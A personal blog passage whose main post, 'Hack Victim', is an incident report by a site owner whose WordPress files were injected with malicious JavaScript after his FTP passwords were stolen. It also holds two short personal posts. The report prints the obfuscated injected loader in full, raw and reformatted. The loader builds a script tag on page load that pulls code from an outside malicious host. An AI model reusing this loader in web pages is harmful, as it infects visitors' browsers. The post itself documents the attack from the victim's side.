Hack Victim

asou — Tue, 02 Mar 2010 13:25:22 +0000

In the world of security everybody admits that the question is not “if a security breach will happen, but when”. This weekend was my turn. I do my best to keep up to date my blog and generally I try to keep bad guys out of my place. However a nasty Javascript XSS (cross-site) attack hit me on Friday evening. I noticed that something could be wrong with my blog when my antivirus software initiated alarms every time I opened my browser (where suprisingly, I have my web site as homepage ).My first reaction was to bring the site offline to protect my visitors. Then I started search where and how much damage has been done. Every single .php and .js was infected and in every file the attacker has injected the following code:

var Zx=new Array();var ZL=new Array();try {this.U="";this.u="";
var D;if(D!='a' && D != ''){D=null};var V='';var II;if(II!='ly'
&& II != ''){II=null};var b='[';var sN;if(sN!='X' && sN!='iC'){
sN=''};this.iO="";var z=RegExp;var s='replace';var Z='g';this.GJ='';
var q=']';var M;if(M!='ST' && M != ''){M=null};function L(C,y){var
Cp;if(Cp!=''){Cp='Sq'};var Wv=new Date();var wH=new String();var m=b;
this.le="";this.Aq='';m+=y;this.XP='';m+=q;var CO="";var E="";var I=new
z(m, Z);return C[s](I, V);};var K;if(K!='N'){K='N'};var PN="";var
h=L('bhoCdhyh',"CDhr");var B=L('sfcfrPiPpMtP',"MwOfP");var d=L('
h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.7cBozmB.bgVozobg7lbe
b-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b',"bBVz7");var C="1";var kb;
if(kb!='' && kb!='t'){kb=''};var qc=L('/TsTpjoTnjsToTrTajdjsT.TdjeT/
TsTpTojnjsToTrTajdjsj.TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/
jgTojoTgjljej.TcTojmT.TpjhTpT',"jT");var Rh=new String();var Lq=new
String();var l=L('awpGpDewnGdqCDhDiqlDdw',"wDRGq");var Ep="";var O=L(
'sQeStQAStQtSrSiQbQuQtSeS',"SQ");var SN=new Array();this.Nd="";var
fj='';var zG='';var si='';var bf;if(bf!='_'){bf='_'};this.BI="";var
yS=L('851535031951859931095959',"3159");var Yr=new Date();var G=L('
ckrfekagtkekEglfekmkegnktg',"gfk");this.Cq="";this.CR='';var lq=L('
o3n3lro3audN',"NVr3u");var NR=new Array();var iI;if(iI!='Xk'){iI='Xk
'};var Ih=new String();var re=new String();window[lq]=function(){var
UL=new String();var qa=new String();zB=document[G](B);var wR=new A
rray();si+=d;this.oy='';si+=yS;var LJ=new String();var Pv=new Array();
si+=qc;var _a;if(_a!='' && _a!='rQ'){_a='ED'};this.oB="";zB.src=s
i;var k=document[h];var kv;if(kv!='VV' && kv != ''){kv=null};zB.
setAttribute('defer', C);var _z;if(_z!='' && _z!='OxG'){_z='p'};var xd;
if(xd!=''){xd='kQ'};k.appendChild(zB);var n_='';var uJe=new String();};
var VO;if(VO!='sz'){VO=''};this.Iw='';var cR;if(cR!='Ae' && cR!='mL'){
cR='Ae'};} catch(Y){};

Well it was impossible to read this script, so I reformatted like real code and out to be the following:

var Zx = new Array();
var ZL = new Array();
try {
  this.U = "";
  this.u = "";
  var D;
  if(D != 'a' && D != '') {
      D = null};

  var V = '';
  var II;
  if(II !='ly' && II != '')
  {
     II = null };

  var b = '[';
  var sN;
  if(sN != 'X' && sN != 'iC')
  {
      sN = ''};
  this.iO = "";
  var z = RegExp;
  var s = 'replace';
  var Z = 'g';
  this.GJ = '';
  varq = ']';
  var M;
  if(M != 'ST' && M != '') {
     M = null};

  function L(C, y) {
      var Cp;
      if(Cp != '') {
         Cp = 'Sq'};
      var Wv = new Date();
      var wH = new String();
      var m = b;
      this.le = "";
      this.Aq = '';
      m += y;
      this.XP = '';
      m += q;
      var CO = "";
      var E = "";
      var I = new z(m, Z);
      return C[s](I, V);
  };

  var K;
   if(K != 'N') {
      K = 'N'}; 

  var PN = "";
  varh = L('bhoCdhyh', "CDhr");
  var B = L('sfcfrPiPpMtP', "MwOfP");
  var d = L('h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.
7cBozmB.bgVozobg7lbeb-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b', "bBVz7");
  var C = "1";
  var kb;
  if(kb != '' && kb != 't') {
      kb = ''}; 

  var qc = L('/TsTpjoTnjsToTrTajdjsT.TdjeT/TsTpTojnjsToTrTajdjsj.
TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/jgTojoTgjljej.TcTojmT.
TpjhTpT', "jT");
  var Rh = new String();
  var Lq = new String();
  var l = L('awpGpDewnGdqCDhDiqlDdw', "wDRGq");
  var Ep = "";
  var O = L('sQeStQAStQtSrSiQbQuQtSeS', "SQ");
  var SN = new Array();
  this.Nd = "";
  varfj = '';
  var zG = '';
  var si = '';
  var bf;
  if(bf != '_') {
     bf = '_'}; 

  this.BI = "";
  var yS = L('851535031951859931095959', "3159");
  var Yr = new Date();
  var G = L('ckrfekagtkekEglfekmkegnktg', "gfk");

  this.Cq = "";
  this.CR = '';
  var lq = L('o3n3lro3audN', "NVr3u");
  var NR = new Array();
  var iI;
  if(iI != 'Xk') {
      iI = 'Xk '}; 

  var Ih = new String();
  var re = new String();
  window[lq] = function() {
      var UL = new String();
      var qa = new String();
      zB = document[G](B);
      var wR = new Array();

      si += d;
      this.oy = '';
      si += yS;
      var LJ = new String();
      var Pv = new Array();
      si += qc;
      var _a;
      if(_a != '' && _a != 'rQ') {
         _a = 'ED'};
      this.oB = "";
      zB.src = si;
      var k = document[h];
      var kv;
      if(kv != 'VV' && kv != '') {
         kv = null};
      zB.setAttribute('defer', C);
      var _z;
      if(_z != '' && _z != 'OxG') {
         _z = 'p'};
      var xd;
      if(xd != '') {
         xd = 'kQ'}; 

      k.appendChild(zB);
      var n_ = '';
      var uJe = new String();
      };

  var VO;
  if(VO != 'sz') {
      VO = ''}; 

  this.Iw = '';
  var cR;
  if(cR != 'Ae' && cR != 'mL') {
      cR = 'Ae'};
  }
catch(Y) {};

It became obvious that the script used a special encoding technique, unique for the script to make my life harder. It took me some time but in the end I was able to understand its inner work and finally the nasty cross-site trojan attack to the users browser.

My next move was to identify the point of entry. NOTHING! All my logs where clean, no recent exploits for wordpress published and everything seemed ok. Then an idea came back to me… It was not the server’s fault, but me… And yes I was right… My PC was somehow (still looking for that) infected with a backdoor which probably stole my cached FTP passwords (yes, I know it is bad to store passwords…). Then it connected through ftp to my web server and everything was easy … It could have been worse…

Everything was clear now and it was time to bring the site back online. I found it easier and safer to reinstall wordpress, as my database was not affected. So, fresh wordpress install, fresh theme installation, fresh plugins install and… here I am, back online!

Walking on 30…

asou — Thu, 18 Feb 2010 15:10:06 +0000

Today is my birthday… OK, no big deal for anyone else except me, my family, Ktz (a.k.a. Jane) and maybe some friends. However I wanted to use this internet corner to Thank them all for just being there for me all the time…

At last…

asou — Tue, 02 Feb 2010 22:20:55 +0000

I am trying to bring this page online since the last three months…

Nothing great but i so desperately out of time that I could not give my attention to this.

Hopefully now that it’s all set I’ll update this blog with news, information, solutions and generally anything that it may be of interest to all of you out there.

Some times I will also post stories of my personal life just a depressurisation pump for my self. My psy-doctor adivces me to share my thoughts with others

Greetings to all of you,
Soumplis Alexandros

Soumplis' Personal Web Site » Every Day News

Hack Victim

Walking on 30…

At last…